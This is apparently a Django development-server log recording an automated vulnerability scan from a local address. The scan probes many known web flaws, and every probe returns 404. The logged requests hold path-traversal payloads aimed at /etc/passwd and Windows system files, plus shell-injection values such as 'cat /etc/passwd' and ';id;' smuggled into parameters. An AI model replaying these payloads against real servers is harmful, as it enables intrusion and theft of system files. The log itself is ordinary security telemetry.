[07/Nov/2020 22:23:09] "GET /nuke50/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2342
Not Found: /nuke50/modules.php
[07/Nov/2020 22:23:10] "GET /nuke50/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2342
Not Found: /cgi-bin/htsearch
[07/Nov/2020 22:23:14] "GET /cgi-bin/htsearch?-c/nonexistent HTTP/1.1" 404 2230
Not Found: /1/1/..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)etc/resolv.conf
[07/Nov/2020 22:23:14] "GET /1/1/..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)etc/resolv.conf HTTP/1.1" 404 2604
Not Found: /story.pl
[07/Nov/2020 22:23:15] "GET /story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 404 2225
Not Found: /1/1/..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)Windows/win.ini
[07/Nov/2020 22:23:15] "GET /1/1/..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)Windows/win.ini HTTP/1.1" 404 2604
Not Found: /scripts/htsearch
[07/Nov/2020 22:23:15] "GET /scripts/htsearch?-c/nonexistent HTTP/1.1" 404 2230
Not Found: /story.pl
[07/Nov/2020 22:23:15] "GET /story.pl?next=about HTTP/1.1" 404 2202
Not Found: /oprocmgr-status
[07/Nov/2020 22:23:15] "GET /oprocmgr-status HTTP/1.1" 404 2212
Not Found: /story/story.pl
[07/Nov/2020 22:23:15] "GET /story/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 404 2243
Not Found: /story/story.pl
[07/Nov/2020 22:23:16] "GET /story/story.pl?next=about HTTP/1.1" 404 2220
Not Found: /cgi-bin/story.pl
[07/Nov/2020 22:23:16] "GET /cgi-bin/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 404 2249
Not Found: /cgi-bin/story.pl
[07/Nov/2020 22:23:17] "GET /cgi-bin/story.pl?next=about HTTP/1.1" 404 2226
Not Found: /cgi-bin/story/story.pl
[07/Nov/2020 22:23:17] "GET /cgi-bin/story/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 404 2267
Not Found: /cgi-bin/story/story.pl
[07/Nov/2020 22:23:17] "GET /cgi-bin/story/story.pl?next=about HTTP/1.1" 404 2244
Not Found: /scripts/story.pl
[07/Nov/2020 22:23:17] "GET /scripts/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 404 2249
Not Found: /scripts/story.pl
[07/Nov/2020 22:23:17] "GET /scripts/story.pl?next=about HTTP/1.1" 404 2226
Not Found: /scripts/story/story.pl
[07/Nov/2020 22:23:17] "GET /scripts/story/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1" 404 2267
Not Found: /scripts/story/story.pl
[07/Nov/2020 22:23:17] "GET /scripts/story/story.pl?next=about HTTP/1.1" 404 2244
[07/Nov/2020 22:23:17] code 400, message Bad request syntax ('ÿ\x00\x00\x00\x00\x00\x00\x00\x01\x7f')
[07/Nov/2020 22:23:17] "ÿ       " 400 -
Not Found: /index.php
[07/Nov/2020 22:23:19] "GET /index.php HTTP/1.0" 404 2194
Not Found: /index.php/wp-json/wp/v2/posts/
[07/Nov/2020 22:23:20] "GET /index.php/wp-json/wp/v2/posts/ HTTP/1.1" 404 2262
Not Found: /wordpress/index.php/wp-json/wp/v2/posts/
[07/Nov/2020 22:23:20] "GET /wordpress/index.php/wp-json/wp/v2/posts/ HTTP/1.1" 404 2292
Not Found: /
[07/Nov/2020 22:23:22] "GET / HTTP/1.1" 404 2149
Not Found: /cgi-bin/mrtg.cgi
[07/Nov/2020 22:23:23] "GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 404 2254
Not Found: /
[07/Nov/2020 22:23:23] "GET / HTTP/1.1" 404 2154
Not Found: /archiva/index.action
[07/Nov/2020 22:23:23] "GET /archiva/index.action HTTP/1.1" 404 2232
Not Found: /index.action
[07/Nov/2020 22:23:23] "GET /index.action HTTP/1.1" 404 2208
Not Found: /scripts/mrtg.cgi
Not Found: /restServices/archivaUiServices/runtimeInfoService/archivaRuntimeInfo/en
[07/Nov/2020 22:23:23] "GET /scripts/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 404 2254
[07/Nov/2020 22:23:23] "GET /restServices/archivaUiServices/runtimeInfoService/archivaRuntimeInfo/en HTTP/1.1" 404 2385
Not Found: /robots
[07/Nov/2020 22:23:23] "GET /robots HTTP/1.1" 404 2190
Not Found: /thebox/thebox.php
[07/Nov/2020 22:23:24] "GET /thebox/thebox.php HTTP/1.0" 404 2218
Not Found: /cgi-bin/zml.cgi
[07/Nov/2020 22:23:24] "GET /cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 2267
Not Found: /./WEB-INF/
[07/Nov/2020 22:23:24] "GET /./WEB-INF/ HTTP/1.1" 404 2195
Not Found: /scripts/zml.cgi
[07/Nov/2020 22:23:25] "GET /scripts/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 2267
Not Found: /
[07/Nov/2020 22:23:25] "GET / HTTP/1.1" 404 2154
Not Found: /%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd
[07/Nov/2020 22:23:25] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 3142
Not Found: /%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/boot.ini
[07/Nov/2020 22:23:25] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini HTTP/1.1" 404 3136
Not Found: /cgi-bin/index.js0x70
[07/Nov/2020 22:23:28] "GET /cgi-bin/index.js0x70 HTTP/1.1" 404 2227
Not Found: /mediawiki/index.php
[07/Nov/2020 22:23:29] "GET /mediawiki/index.php?title=Special%3aUserLogin&returnto=Main%2bPage HTTP/1.1" 404 2280
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 59856)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /scripts/index.js0x70
[07/Nov/2020 22:23:29] "GET /scripts/index.js0x70 HTTP/1.1" 404 2227
Not Found: /mediawiki-1.20.3/index.php
[07/Nov/2020 22:23:29] "GET /mediawiki-1.20.3/index.php?title=Special%3aUserLogin&returnto=Main%2bPage HTTP/1.1" 404 2301
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 59864)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /mediawiki-1.19.4/index.php
[07/Nov/2020 22:23:29] "GET /mediawiki-1.19.4/index.php?title=Special%3aUserLogin&returnto=Main%2bPage HTTP/1.1" 404 2301
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 59882)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:23:30] "POST /?routestring=ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 2212
Not Found: /vb5/
[07/Nov/2020 22:23:30] "POST /vb5/?routestring=ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 2242
Not Found: /vb/
[07/Nov/2020 22:23:30] "POST /vb/?routestring=ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 2239
Not Found: /vBulletin/
[07/Nov/2020 22:23:30] "POST /vBulletin/?routestring=ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 2260
Not Found: /cgi_bin/test-cgi
[07/Nov/2020 22:23:33] "GET /cgi_bin/test-cgi?/* HTTP/1.1" 404 2218
Not Found: /cgi-bin/test-cgi
[07/Nov/2020 22:23:34] "GET /cgi-bin/test-cgi?/* HTTP/1.1" 404 2218
Not Found: /scripts/test-cgi
[07/Nov/2020 22:23:34] "GET /scripts/test-cgi?/* HTTP/1.1" 404 2218
Not Found: /cgi-bin/awstats.pl
[07/Nov/2020 22:23:34] "GET /cgi-bin/awstats.pl?configdir=%7Ccat%20/etc/passwd;\n%7C HTTP/1.0" 404 2260
Not Found: /statistics/awstats.pl
[07/Nov/2020 22:23:34] "GET /statistics/awstats.pl?configdir=%7Ccat%20/etc/passwd;\n%7C HTTP/1.0" 404 2269
Not Found: /admin/uploadplugin.action
Not Found: /awstats/awstats.pl
[07/Nov/2020 22:23:34] "GET /admin/uploadplugin.action HTTP/1.1" 404 2247
[07/Nov/2020 22:23:34] "GET /awstats/awstats.pl?configdir=%7Ccat%20/etc/passwd;\n%7C HTTP/1.0" 404 2260
Not Found: /cgi-bin/awstats/awstats.pl
[07/Nov/2020 22:23:35] "GET /cgi-bin/awstats/awstats.pl?configdir=%7Ccat%20/etc/passwd;\n%7C HTTP/1.0" 404 2284
Not Found: /+CSCOT+/oem-customization
[07/Nov/2020 22:23:35] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 2348
Not Found: /crowd/admin/uploadplugin.action
[07/Nov/2020 22:23:35] "GET /crowd/admin/uploadplugin.action HTTP/1.1" 404 2265
Not Found: /+CSCOT+/translation-table
[07/Nov/2020 22:23:35] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 2333
Not Found: /cgi-bin/powerup/r.cgi
[07/Nov/2020 22:23:40] "GET /cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2276
Not Found: /cgi_bin/powerup/r.cgi
[07/Nov/2020 22:23:40] "GET /cgi_bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2276
Not Found: /cgi-bin/r.cgi
[07/Nov/2020 22:23:40] "GET /cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2252
Not Found: /scripts/r.cgi
[07/Nov/2020 22:23:41] "GET /scripts/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2252
Not Found: /digi-news/admin.php
[07/Nov/2020 22:23:42] "GET /digi-news/admin.php?action=config HTTP/1.0" 404 2238
Not Found: /blazeds/messagebroker/amf
[07/Nov/2020 22:23:44] "POST /blazeds/messagebroker/amf HTTP/1.1" 404 2248
Not Found: /
[07/Nov/2020 22:23:45] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:23:45] "POST / HTTP/1.1" 404 2155
Not Found: /cgi-bin/store.cgi
[07/Nov/2020 22:23:46] "GET /cgi-bin/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1" 404 2272
Not Found: /scripts/store.cgi
[07/Nov/2020 22:23:47] "GET /scripts/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1" 404 2272
Not Found: /eam/vib
[07/Nov/2020 22:23:49] "GET /eam/vib?id=C:\Windows\win.ini HTTP/1.1" 404 2219
Not Found: /eam/vib
[07/Nov/2020 22:23:49] "GET /eam/vib?id=/etc/passwd HTTP/1.1" 404 2208
Not Found: /spywall/blocked_file.php
[07/Nov/2020 22:23:50] "POST /spywall/blocked_file.php HTTP/1.1" 404 2245
Not Found: /spywall/images/upload/temp/temp.php
[07/Nov/2020 22:23:50] "GET /spywall/images/upload/temp/temp.php HTTP/1.1" 404 2277
Not Found: /
[07/Nov/2020 22:23:51] "RSAS / HTTP/1.0" 404 2155
Not Found: /ROADS/cgi-bin/search.pl
[07/Nov/2020 22:23:55] "GET /ROADS/cgi-bin/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1" 404 2273
Not Found: /cgi-bin/search.pl
[07/Nov/2020 22:23:55] "GET /cgi-bin/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1" 404 2255
Not Found: /scripts/search.pl
[07/Nov/2020 22:23:56] "GET /scripts/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1" 404 2255
Not Found: /jsp/jspsamp/jspexamples/viewsource.jsp
[07/Nov/2020 22:23:57] "GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini HTTP/1.1" 404 2325
Not Found: /jsp/jspsamp/jspexamples/viewsource.jsp
[07/Nov/2020 22:23:58] "GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd HTTP/1.1" 404 2327
Not Found: /imc/login.jsf
[07/Nov/2020 22:23:58] "GET /imc/login.jsf HTTP/1.1" 404 2211
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 37492)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /demo/ojspext/events/index.jsp
[07/Nov/2020 22:23:59] "GET /demo/ojspext/events/index.jsp HTTP/1.1" 404 2254
Not Found: /cgi-bin/hsx.cgi
[07/Nov/2020 22:24:00] "GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 2270
Not Found: /piwigo/install.php
[07/Nov/2020 22:24:00] "GET /piwigo/install.php?dl=/../../local/config/index.php HTTP/1.1" 404 2259
Not Found: /install.php
[07/Nov/2020 22:24:01] "GET /install.php?dl=/../../local/config/index.php HTTP/1.1" 404 2238
Not Found: /scripts/hsx.cgi
[07/Nov/2020 22:24:01] "GET /scripts/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 2270
Not Found: /olt/Login.do/../../olt/UploadFileUpload.do
[07/Nov/2020 22:24:02] "POST /olt/Login.do/../../olt/UploadFileUpload.do HTTP/1.1" 404 2280
Not Found: /olt/Login.do/../../olt/UploadFileUpload.do
[07/Nov/2020 22:24:03] "POST /olt/Login.do/../../olt/UploadFileUpload.do HTTP/1.1" 404 2280
Not Found: /info
[07/Nov/2020 22:24:03] "GET /info HTTP/1.1" 404 2184
Not Found: /ui/login.php
[07/Nov/2020 22:24:04] "GET /ui/login.php HTTP/1.1" 404 2208
Not Found: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd
[07/Nov/2020 22:24:05] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 404 2334
Not Found: /HessianTest/hessian
[07/Nov/2020 22:24:06] "POST /HessianTest/hessian HTTP/1.0" 404 2230
Not Found: /users
[07/Nov/2020 22:24:07] "GET /users HTTP/1.1" 404 2187
Not Found: /user
[07/Nov/2020 22:24:08] "GET /user HTTP/1.1" 404 2184
Not Found: /account
[07/Nov/2020 22:24:08] "GET /account HTTP/1.1" 404 2193
Not Found: /
[07/Nov/2020 22:24:13] "HEAD / HTTP/1.1" 404 2150
Not Found: /cgi-bin/ash
[07/Nov/2020 22:24:14] "GET /cgi-bin/ash HTTP/1.1" 404 2205
Not Found: /cgi-bin/bash
[07/Nov/2020 22:24:14] "GET /cgi-bin/bash HTTP/1.1" 404 2208
Not Found: /cgi-bin/csh
[07/Nov/2020 22:24:14] "GET /cgi-bin/csh HTTP/1.1" 404 2205
Not Found: /cgi-bin/ksh
[07/Nov/2020 22:24:14] "GET /cgi-bin/ksh HTTP/1.1" 404 2205
Not Found: /cgi-bin/sh
[07/Nov/2020 22:24:14] "GET /cgi-bin/sh HTTP/1.1" 404 2202
Not Found: /cgi-bin/tcsh
[07/Nov/2020 22:24:14] "GET /cgi-bin/tcsh HTTP/1.1" 404 2208
Not Found: /
[07/Nov/2020 22:24:14] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/zsh
[07/Nov/2020 22:24:15] "GET /cgi-bin/zsh HTTP/1.1" 404 2205
Not Found: /scripts/ash
[07/Nov/2020 22:24:15] "GET /scripts/ash HTTP/1.1" 404 2205
Not Found: /scripts/bash
[07/Nov/2020 22:24:15] "GET /scripts/bash HTTP/1.1" 404 2208
Not Found: /cgi-bindirectory.php
[07/Nov/2020 22:24:15] "GET /cgi-bindirectory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1" 404 2252
Not Found: /scripts/csh
[07/Nov/2020 22:24:16] "GET /scripts/csh HTTP/1.1" 404 2205
Not Found: /scripts/ksh
[07/Nov/2020 22:24:16] "GET /scripts/ksh HTTP/1.1" 404 2205
Not Found: /scripts/sh
[07/Nov/2020 22:24:16] "GET /scripts/sh HTTP/1.1" 404 2202
Not Found: /scriptsdirectory.php
[07/Nov/2020 22:24:16] "GET /scriptsdirectory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1" 404 2252
Not Found: /scripts/tcsh
[07/Nov/2020 22:24:16] "GET /scripts/tcsh HTTP/1.1" 404 2208
Not Found: /scripts/zsh
[07/Nov/2020 22:24:16] "GET /scripts/zsh HTTP/1.1" 404 2205
Not Found: /cgi-bin/edit_image.php
[07/Nov/2020 22:24:18] "GET /cgi-bin/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20 HTTP/1.1" 404 2292
Not Found: /scripts/edit_image.php
[07/Nov/2020 22:24:19] "GET /scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20 HTTP/1.1" 404 2292
Not Found: /jmx-console/HtmlAdaptor
[07/Nov/2020 22:24:20] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 404 2242
Not Found: /servlet/admin
[07/Nov/2020 22:24:21] "GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0" 404 2472
Not Found: /
[07/Nov/2020 22:24:22] "POST / HTTP/1.1" 404 2155
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 41476)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /../../../../../../../../../../../etc/passwd
[07/Nov/2020 22:24:22] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1" 404 2268
Not Found: /../../../../../../../../../../../windows/win.ini
[07/Nov/2020 22:24:22] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../windows/win.ini HTTP/1.1" 404 2283
Not Found: /dcforum/dcforum.cgi
[07/Nov/2020 22:24:26] "GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1" 404 2277
Not Found: /
[07/Nov/2020 22:24:26] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:24:26] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:24:26] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/dcforum.cgi
[07/Nov/2020 22:24:26] "GET /cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1" 404 2277
Not Found: /scripts/dcforum.cgi
[07/Nov/2020 22:24:27] "GET /scripts/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1" 404 2277
Not Found: /news/ashnews.php
[07/Nov/2020 22:24:29] "POST /news/ashnews.php HTTP/1.0" 404 2216
Not Found: /
[07/Nov/2020 22:24:31] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/ttawebtop.cgi/
[07/Nov/2020 22:24:33] "GET /cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 2297
Not Found: /Admin.po
[07/Nov/2020 22:24:33] "GET /Admin.po?proceed=yes HTTP/1.1" 404 2203
Not Found: /scripts/ttawebtop.cgi/
[07/Nov/2020 22:24:33] "GET /scripts/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 2297
Not Found: /public/index.php
[07/Nov/2020 22:24:34] "POST /public/index.php?s=captcha HTTP/1.1" 404 2231
Not Found: /index.php
[07/Nov/2020 22:24:34] "POST /index.php?s=captcha HTTP/1.1" 404 2210
Not Found: /cgi-bin/index.php
[07/Nov/2020 22:24:34] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1" 404 2267
Not Found: /scripts/index.php
[07/Nov/2020 22:24:35] "GET /scripts/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1" 404 2267
Not Found: /phpcms/api.php
[07/Nov/2020 22:24:36] "GET /phpcms/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin HTTP/1.1" 404 2403
Not Found: /install_package/api.php
[07/Nov/2020 22:24:36] "GET /install_package/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin HTTP/1.1" 404 2430
Not Found: /api.php
[07/Nov/2020 22:24:36] "GET /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin HTTP/1.1" 404 2382
Not Found: /
[07/Nov/2020 22:24:40] "GET / HTTP/1.1" 404 2149
Not Found: /rails/info/properties
[07/Nov/2020 22:24:44] "GET /rails/info/properties HTTP/1.1" 404 2235
Not Found: /
[07/Nov/2020 22:24:44] "GET / HTTP/1.1" 404 2154
Not Found: /SiteScope/services/APISiteScopeImpl
[07/Nov/2020 22:24:47] "GET /SiteScope/services/APISiteScopeImpl HTTP/1.1" 404 2277
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 46072)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:24:48] "POST / HTTP/1.0" 404 2150
Not Found: /
[07/Nov/2020 22:24:51] "GET / HTTP/1.1" 404 2154
Not Found: /login.html
[07/Nov/2020 22:24:51] "GET /login.html HTTP/1.1" 404 2202
Not Found: /index.php
[07/Nov/2020 22:24:52] "GET /index.php HTTP/1.0" 404 2194
